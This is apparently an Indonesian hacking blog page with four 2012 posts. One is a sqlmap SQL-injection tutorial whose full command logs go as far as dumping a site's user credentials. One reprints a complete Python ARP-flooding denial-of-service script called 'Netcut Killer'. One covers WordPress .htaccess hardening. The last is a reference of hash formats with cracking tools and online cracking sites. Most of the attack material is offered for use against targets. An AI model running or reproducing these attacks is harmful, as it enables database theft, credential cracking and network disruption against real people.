Rabu, 21 Maret 2012

SQL Map In Windows

 Hallo saya hanya ingin berbagi ilmu saja SQL Map di Windows ini saya pake Win7 itu themanya di SS classic jadi seperti XP,, hehehe
Ok langsung saja Download dahulu alat perangnya:
-SQL Map 0.0.9
-Pyhton 2.7


Install pythonnya
extract SQLmapnya(misalkan saya extrack di C:\sqlmap )

Pertama Siapkan website yang vuln
sekarang kita buka cmd (command and prompt)
Klik Start ->All Programs -> Accessories-> Command and prompt
atau WIN-Key + R ketik cmd  (Start -> Run ->ketik  CMD  enter)

sekarang kita menuju direktory dimana tempat folder sqlmap berada
pertama kita ketik perintah cd\  [enter]
maka kita akan drive C
lalu menuju folder sqlmap dengan cara ketik
cd sqlmap [enter]
maka akan ke C:\sqlmap>

Ok kita mulai
ketik perintah yang berwarna merah setelah menuju folder sqlmap berada folder sqlmap saya di drive C:\sqlmap
______________
sqlmap.py -u http://www.targetnmu.co.id/product.php?kat1=3 --dbs
yang berwarna biru diganti web vuln kamu
lihat gambar ini:




setelah di enter maka script sqlmap akan bekerja untuk mencari nama databasenya
Berikut Log Lengkap cmd nya

C:\sqlmap>sqlmap.py -u http://www.targetmu.co.id/product.php?kat1=3 --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 19:40:56

[19:40:57] [INFO] using 'C:\sqlmap\output\www.targetmu.co.id\session' as sessio
n file
[19:40:57] [INFO] testing connection to the target url
[19:41:04] [INFO] testing if the url is stable, wait a few seconds
[19:41:09] [INFO] url is stable
[19:41:09] [INFO] testing if GET parameter 'kat1' is dynamic
[19:41:12] [INFO] confirming that GET parameter 'kat1' is dynamic
[19:41:15] [INFO] GET parameter 'kat1' is dynamic
[19:41:18] [INFO] heuristic test shows that GET parameter 'kat1' might be inject
able (possible DBMS: MySQL)
[19:41:18] [INFO] testing sql injection on GET parameter 'kat1'
[19:41:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:41:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:42:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:42:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you wan
t to skip test payloads specific for other DBMSes? [Y/n] y
[19:43:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:45:12] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
 going to retry the request
[19:45:38] [INFO] target url appears to be UNION injectable with 2 columns
[19:45:47] [INFO] GET parameter 'kat1' is 'MySQL UNION query (NULL) - 1 to 10 co
lumns' injectable
GET parameter 'kat1' is vulnerable. Do you want to keep testing the others? [y/N
] n
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: kat1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: kat1=3 UNION ALL SELECT CONCAT(CHAR(58,122,104,120,58),CHAR(82,70,1
13,82,104,106,74,65,116,103),CHAR(58,106,113,113,58)), NULL#
---

[19:45:53] [INFO] testing MySQL
[19:45:59] [INFO] confirming MySQL
[19:46:12] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[19:46:12] [INFO] fetching database names
available databases [2]:
[*] green_datadedaunan
[*] information_schema

[19:46:16] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
targetmu.co.id'

[*] shutting down at: 19:46:16


Lihat yang warna merah itu adalah database web

Lalu kita lihat isi tablenya dengan mengetik

sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan --tables [enter]


yang warna merah diganti web targetnya terus  warna hijau database nya diganti database yng muncul 
fungsi :
-D = database

--tables=untuk mendapat tables dari db

Log CMD nya

C:\sqlmap>sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_da
tadedaunan --tables

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 19:46:35

[19:46:35] [INFO] using 'C:\sqlmap\output\www.targetjlaco.id\session' as sessio
n file
[19:46:35] [INFO] resuming injection data from session file
[19:46:35] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:46:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: kat1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: kat1=3 UNION ALL SELECT CONCAT(CHAR(58,122,104,120,58),CHAR(82,70,1
13,82,104,106,74,65,116,103),CHAR(58,106,113,113,58)), NULL#
---

[19:46:42] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
[19:46:42] [INFO] fetching tables for database 'green_datadedaunan'
Database: green_datadedaunan
[6 tables]
+--------------+
| green_kat1   |
| green_kat2   |
| green_news   |
| green_page   |
| green_produk |
| green_user   |
+--------------+

[19:46:48] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
targetkamu.co.id'

[*] shutting down at: 19:46:48

eh muncul juga table dalam databasenya

+--------------+
| green_kat1   |
| green_kat2   |
| green_news   |
| green_page   |
| green_produk |
| green_user   |
+--------------+

kita lihat dari table tersebut kira2 user dimana? mungkin di green_user :)
ayo kita check dengan perintah ini
sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan -T green_users --columns [ENter]
-T = nama table
--columns=melihat columns di table



Log CMD

C:\sqlmap>sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_da
tadedaunan -T green_user --columns


    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net


[*] starting at: 19:47:03


[19:47:04] [INFO] using 'C:\sqlmap\output\www.targe.co.id\session' as sessio
n file
[19:47:04] [INFO] resuming injection data from session file
[19:47:04] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:47:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: kat1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: kat1=3 UNION ALL SELECT CONCAT(CHAR(58,122,104,120,58),CHAR(82,70,1
13,82,104,106,74,65,116,103),CHAR(58,106,113,113,58)), NULL#
---


[19:47:10] [INFO] the back-end DBMS is MySQL


web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
[19:47:10] [INFO] fetching columns for table 'green_user' on database 'green_dat
adedaunan'
Database: green_datadedaunan
Table: green_user
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(6)  |
| sbg      | char(1)     |
| username | varchar(20) |
+----------+-------------+


[19:47:15] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
targetkamu.co.id'


[*] shutting down at: 19:47:15
Sekarang kita lihat username dan passwordnya dari column tersbut


sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan -T green_users -C username,password,sbg --dump

yang berwaran hijau tegantung web tersbit memilik db , tabel, column apa



C:\sqlmap>sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_da
tadedaunan -T green_user -C username,password,sbg --dump


    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net


[*] starting at: 19:47:44


[19:47:44] [INFO] using 'C:\sqlmap\output\www.targetkamu.co.id\session' as sessio
n file
[19:47:44] [INFO] resuming injection data from session file
[19:47:44] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:47:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: kat1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: kat1=3 UNION ALL SELECT CONCAT(CHAR(58,122,104,120,58),CHAR(82,70,1
13,82,104,106,74,65,116,103),CHAR(58,106,113,113,58)), NULL#
---


[19:47:48] [INFO] the back-end DBMS is MySQL


web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
[19:47:48] [INFO] fetching columns 'username, password, sbg' entries for table '
green_user' on database 'green_datadedaunan'
Database: green_datadedaunan
Table: green_user
[1 entry]
+----------+-----+----------+
| password | sbg | username |
+----------+-----+----------+
| hijau    | 1   | marbun   |
+----------+-----+----------+


[19:47:53] [INFO] Table 'green_datadedaunan.green_user' dumped to CSV file 'C:\s
qlmap\output\www.targetkamu.co.id\dump\green_datadedaunan\green_user.csv'
[19:47:53] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
target.co.id'


[*] shutting down at: 19:47:53

Lihat itu username dan passwordnya ^ atau yg gambar ini

semoga mudeng dengan tutorial yang saya buat , sekian terimakasih

Read more »

Minggu, 18 Maret 2012

Netcut Killer in Linux

"Netcut 2.0 Denial Of Service" atau bisa juga disebut Netcut Killer
Buat yang sering di cut cut ama netcut si windows pake aja tools ini, dijamin windowsnya blank hik-hik..

==============================CODE=====================================


#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
#Blog: http://mayaseven.blogspot.com
#PoC: Video  http://www.youtube.com/user/mayaseven
#Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
#Version: Netcut 2
#Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
#Tested on: Windows Xp, Windows 7
#Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
import commands,os,sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip  = commands.getoutput("ip route list | grep default").split()[2]
        
def protect(gw_ip,gw_mac):
        os.popen("arp -s %s %s" %(gw_ip,gw_mac))
        print "Protected himself"
        
def detect():
                ans = sniff(filter='arp',timeout=7)
                target=[]
                for r in ans.res:
                        target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
                return target

def preattack(gw_ip):
        num = []
        count = 0
        target = 0
        temp = 0
        print "Detecting..."
        d = detect()
        for i in range(len(d)):
                if d[i].split()[0] == "255.255.255.255":
                        num.append(d.count(d[i]))
                        if d.count(d[i]) > count:
                                count = d.count(d[i])
                                target = i
                if d[i].split()[0] == gw_ip:
                        temp += 1         
        if len(d) < 7:
                print "[-] No one use Netcut or try again"
                exit()
        if len(num)*7 < temp:
                num[:] = []
                count = 0
                result = float(temp)/len(d)*100
                for j in range(len(d)):
                        if d[i].split()[0] == gw_ip:
                                num.append(d.count(d[j]))
                                if d.count(d[i]) > count:
                                        count = d.count(d[i])
                                        target = i
                        num.reverse()
                        result = float(temp)/len(d)*100
                print target
        else:
                num.reverse()
                result = float(num[0]+temp)/len(d)*100
        
        print "There is a possibility that " + str(result) + "%"
        if result>= 50:
                target_mac = d[target].split()[1]
                target_ip = d[target].split()[2]
                print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
                attack(target_mac,target_ip,gw_ip)      
        else:
                print "[-] No one use Netcut or try again"

def attack(target_mac,target_ip,gw_ip):
        print "[+]Counter Attack !!!"
        e = Ether(dst="FF:FF:FF:FF:FF:FF")
        while 1:
                a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
                p = e/a/Padding("\x00"*18)
                sendp(p,verbose=0)
                a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
                p1 = e/a1/Padding("\x00"*18)
                sendp(p1,verbose=0)
                
if __name__ == '__main__':
        os.system("clear")
        print   "###################################################"
        print   " __  __        __       __     _____   __        __  _   _"
        print   "|  \/  |   \ \   / /   / ____|  \ \    / / | \ | |"
        print   "| \  / | __ \ \_/ /_ _| (___   __\ \  / /__|  \| |"
        print   "| |\/| |/ _\ \   / _\ |\___ \ / _ \ \/ / _ \ . \ |"
        print   "| |  | | (_| || | (_| |____) |  __/\  /  __/ |\  |"
        print   "|_|  |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
        print   " "
        print   "###################################################"
        print   ""
        print   "http://mayaseven.blogspot.com"
        print   ""
        if len(sys.argv) == 2 or len(sys.argv) == 3:
                if len(sys.argv) == 2:
                        conf.iface=sys.argv[1]
                        preattack(gw_ip)
                if len(sys.argv) == 3:
                        conf.iface=sys.argv[1]
                        gw_mac = sys.argv[2]
                        protect(gw_ip,gw_mac)
                        preattack(gw_ip)
        else:
                print '''Mode:  
1.)Attack only
Usage: NetcutKiller
e.g. NetcutKiller.py wlan0
                
2.)Attack with protect himself
Usage: NetcutKiller
e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
'''

Ni juga videonya hehe rasain tu


Credit:Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)

Read more »

Sabtu, 17 Maret 2012

Amankan Wordpress dengan htaccces

Mari kita bahas tentang file .htaccess,apa itu .htacess..? file .htaccess adalah file teks ASCII yang terletak di dalam root direktori biasanya “public_html” atau klo hosting free di “htdocs” yang sering digunakan untuk mengubah pengaturan default dari web server yang digunakan. Sehingga manfaat dari file .htaccess ini besar sekali. Dan merupakan Web Utility yang sering digunakan oleh para web master.
lalu apa saja yang harus di amankan di wordpress.?bnyak kk,conthnya /wp-admin,/wp-includes,wp-login.php,wp-db.php,wp-config.php ./etc..
langsung aja gan, source code yang nanti ane kasih kk tinggal copy lalu paste aja di .htaccess,udah tahu kali..
Akses halaman /Wp-Admin Login dengan Private IP/Single IP

++++++source code++++++
AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName “Access Control”
AuthType Basic
order deny,allow
deny from all
# IP address sobat
allow from **.***.***.**
++++++source code++++++

Coba perhatikan, **.***.***.** rubah sama IP kk,jadi khusus satu IP aja yang bisa akses halaman itu..
Terus gimana dengan wp-login.php itu juga sama kan buat login..? Hmm tenang gan, kita lanjut ke wp-login.php, pake private IP juga..


++++++source code++++++
Order deny,allow
Deny from All
Allow from **.***.***.**
++++++source code++++++

sama seperti diatas, ganti tulisan **.***.***.** pake IP kk, kalau buat yang IP nya dinamis atau login di tempat berbeda, mending tidak usah, coz itu cuma buat satu IP doanq,




Amankan Wp-Config.php

Lanjut kk,sekarang kita mw amanin file wp-config.php,dh tahu kan wp-config.php itu kegunaanya,maka dari itu mari kita amankan.. nih codenya..

++++++source code++++++
# protect wpconfig.php
order allow,deny
deny from all
++++++source code++++++

Selajutnya kita bahas kebagian direktori Wp-includes,nah klo kata orang-orang sih di dalem direktori wp-includes itu ada wp-db.php yang bisa ngebongkar semua data penting kita kk,
buat jaga-jaga wp-includes dari serangan yang gk berwenang buat file index.php atau index.html di direktori itu gan. Untuk wp-db.php coba agan akses, adanya di wp-includes/wp-db.php pasti terjadi error gitu kan, klo emang disitu kelemahanya marilah kita tutupi, caranya buat file .htaccess dibagian di rektori wp-includes, terus isi sama code ini..

++++++source code++++++
RewriteEngine On
RewriteBase /
RewriteRule .*\.php$ readme.html [L]
++++++source code++++++

Perhatikan sama tulisan yang bercetak tebal, itu file readme dari wordpress, nah kita coba mengalihkan file wp-db.php ke file readme.html dengan cara di atas.
Ok selesai,semoga bermanfaat dan berguna..

Terimakasih pada : ArS

Read more »

Jumat, 16 Maret 2012

Macam-Macam Hash

DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"Wink, then there follows the actual hash.

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"Wink, then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.


MD5(APR)
Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
Used in Linux and other similar OS.
Length: 37 characters.
Description: The hash begins with the $apr1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"Wink, then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.

MD5(phpBB3)
Example: $H$9123456785DAERgALpsri.D9z3ht120
Used in phpBB 3.x.x.
Length: 34 characters.
Description: The hash begins with the $H$ signature, then there goes one character (most often the number '9'Wink, then there goes the salt (8 random characters; in our example the salt is the string "12345678"Wink, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2048 times.

MD5(Wordpress)
Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
Used in Wordpress.
Length: 34 characters.
Description: The hash begins with the $P$ signature, then there goes one character (most often the number 'B'Wink, then there goes the salt (8 random characters; in our example the salt is the string "12345678"Wink, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 8192 times.

MySQL
Example: 606717496665bcba
Used in the old versions of MySQL.
Length: 8 bytes.
Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
Length: 16 bytes.
Algorithm: The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.

MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in phpBB v2.x, Joomla version below 1.0.13 and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the md5() function in PHP.

md5($pass.$salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News, Joomla version 1.0.13 and higher.
Length: 16 bytes.

md5($salt.$pass)
Example: f190ce9ac8445d249747cab7be43f7d5:12
Used in osCommerce, AEF, Gallery and other CMS.
Length: 16 bytes.

md5(md5($pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS.
Length: 16 bytes.

md5(md5($pass).$salt)
Example: 6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB.
Length: 16 bytes.

md5(md5($salt).md5($pass))
Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
Length: 16 bytes.

md5(md5($salt).$pass)
Example: 816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
Length: 16 bytes.

md5($salt.$pass.$salt)
Example: a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
Length: 16 bytes.

md5($salt.md5($salt.$pass))
Example: 1d715e52285e5a6b546e442792652c8a:1234
Used in DLP.
Length: 16 bytes.

SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as the sha1() function in PHP.

sha1(strtolower($username).$pass)
Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.

sha1($salt.sha1($salt.sha1($pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
Length: 20 bytes.


SHA-256(Unix)
Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqiKSNK1rkTk9zYE1v0
Used in Linux and other similar OS.
Length: 55 characters.
Description: The hash begins with the $5$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"Wink, then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-256 algorithm 5000 times.

SHA-512(Unix)
Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEmFNLlq6Ik9X3reMXY3doKEuxrcDohKUx0Oxf44aeTI​xGEjssvtT1aKyZHjs
Used in Linux and other similar OS.
Length: 98 characters.
Description: The hash begins with the $6$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"Wink, then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-512 algorithm 5000 times.

====================================

Windows 2000 / Windows XP / Windows Server 2003 / Windows Vista / Windows Server 2008 / Windows 7
Hash type: NTLM
Example: 9f4df2fecd29d92e2e1a989541cf1bdf

Mandriva Linux(2010)
Hash type: Blowfish(OpenBSD)

Ubuntu Linux(10.10) / Backtrack(4)
Hash type: SHA-512(Unix)

Debian Linux(5.*)
Hash type: MD5(Unix)

OpenSuSe(11.1)
Hash type: Blowfish(OpenBSD)

RedHat Enterprise Linux(5) / CentOS(5)
Hash type: MD5(Unix)

Fedora(12)
Hash type: SHA-512(Unix)

Solaris(11)
Hash type: SHA-256(Unix)

HP-UX(11i v3)
Hash type: SHA-512(Unix)

HP-UX(старые верси&#1080Wink
Hash type: DES(Unix)

IBM AIX(6.1)
Hash type: SSHA-1
Example: {ssha1}06$JcBuCWY2GaHrLwc0$JXfeozdbk9dAVxj8xpxpqCZT..N

Gentoo Linux(10)
Hash type: MD5(Unix)

Slackware Linux(13)
Hash type: MD5(Unix)

MacOS X(10.4+)
Hash type: Salted SHA-1
Example: 33BA7C74C318F5D3EF40EB25E1C42F312ACF905E20540226 ("33BA7C74" is salt in the hexadecimal format)

MacOS X(<=10.2)
Hash type: DES(Unix)

FreeBSD([0-9])
Hash type: MD5(Unix)

OpenBSD(*)
Hash type: Blowfish(OpenBSD)

NetBSD(*)
Hash type: DES(Unix), MD5(Unix), Blowfish(OpenBSD) or SHA-1(Unix)

Arch Linux(2010)
Hash type: MD5(Unix), SHA-256(Unix) or SHA-512(Unix)

Examples:
DES(Unix): 7rpABVh3LoKjE
MD5(Unix): $1$FSh3ps5T$Etg/3eGiSBqdGahf29lIN1
SHA1(Unix): $sha1$21773$uV7PTeux$I9oHnvwPZHMO0Nq6/WgyGV/tDJIH
Blowfish(OpenBSD): $2a$04$3/vwv4ibdVz2SUG3w.SRwOgI6kk7FUmmCVswZ/KUS9bngvgGEkqNq
SHA-256(Unix): $5$12345678$5B8vYYiY.CVt1RlTTf8KbXBH3hsxY/GNooZaBBGWEc5
SHA-512(Unix): $6$FFH2inEE$bDig7qKFq0m3wZY6BahqWjTzmcFma9rAfPPocCvyXKyGqrErw5s1daWDotarbiUk76Sb​8NO/ZhJ8WzeM6RW.q0

Source : insidepro.com



SOFTWARE BUAT BruteForce Hashnya 

PasswordsPro
- Operating System: Windows NT/2000/XP/2003/Vista/7
- Developer: insidepro.com

SAMInside
- Operating System: Windows NT/2000/XP/2003/Vista/7
- Developer: insidepro.com

Extreme GPU Bruteforcer
- Operating System: Windows NT/2000/XP/2003/Vista/7
- Developer: insidepro.com

World Fastest MD5 cracker BarsWF
- Operating System: Windows NT/2000/XP/2003/Vista/7
- Developer: http://3.14.by/en/md5

hashcat
- Operating System: Linux, Windows XP/Vista/7
- Developer: hashcat.net/hashcat/

oclHashcat
- Operating System: Linux, Windows XP/Vista/7
- Developer: hashcat.net

John the Ripper
- Operating System: Cross-platform
- Developer : openwall.com 


Online Cracking

-MD5

Hashkiller.com
c0llision.net
passcracking.com
tmto.org
md5decrypter.co.uk
md5this.com
bitdelivery.net
crackfor.me
ihteam.net
md5.my-addr.com
md5pass.info
hashcrack.com
generuj.pl
authsecu.com
md5decryption.com
md5decrypter.com
md5-db.de
md5online.net
hash-database.net
web-security-services.com
hash.toolz.in
isc.sans.org
md5-lookup.com
gromweb.com
noisette.ch
crackfoo.nicenamecrew.com
shell-storm.org
askcheck.com
hashcracking.com
md5.net
web-max.ca
xanadrel.99k.org
md5.com.cn
hash-cracker.com
bigtrapeze.com
cloudcracker.net
gat3way.eu
vulnlabs.org
tobtu.com
cmd5hash.com
onlinehashcrack.com
freerainbowtables.com
xdecrypt.com
hax0r.in
crackstation.net
md5-decrypter.com
netmd5crack.com
xmd5.org

SHA1:

md5decrypter.co.uk
hash.toolz.in
isc.sans.org
stringfunction.com
md5-lookup.com
crackfoo.nicenamecrew.com
askcheck.com
vulnlabs.org
xdecrypt.com


ICQ:

hashkiller.com (405-701-776) <- md5

LM:

lmcrack.com
crackfoo.nicenamecrew.com
bitdelivery.net

NTLM:

md5decrypter.co.uk
bitdelivery.net
traaad.org

IRC:

c0llision.net (#md5crack channel on ix.dal.net)

Multi:

hashkiller.com
md5hashcracker.appspot.com
hashchecker.de
crackfor.me
kalkulators.org
hash-decrypt.com 


Sumber HN

Read more »

Friends Blog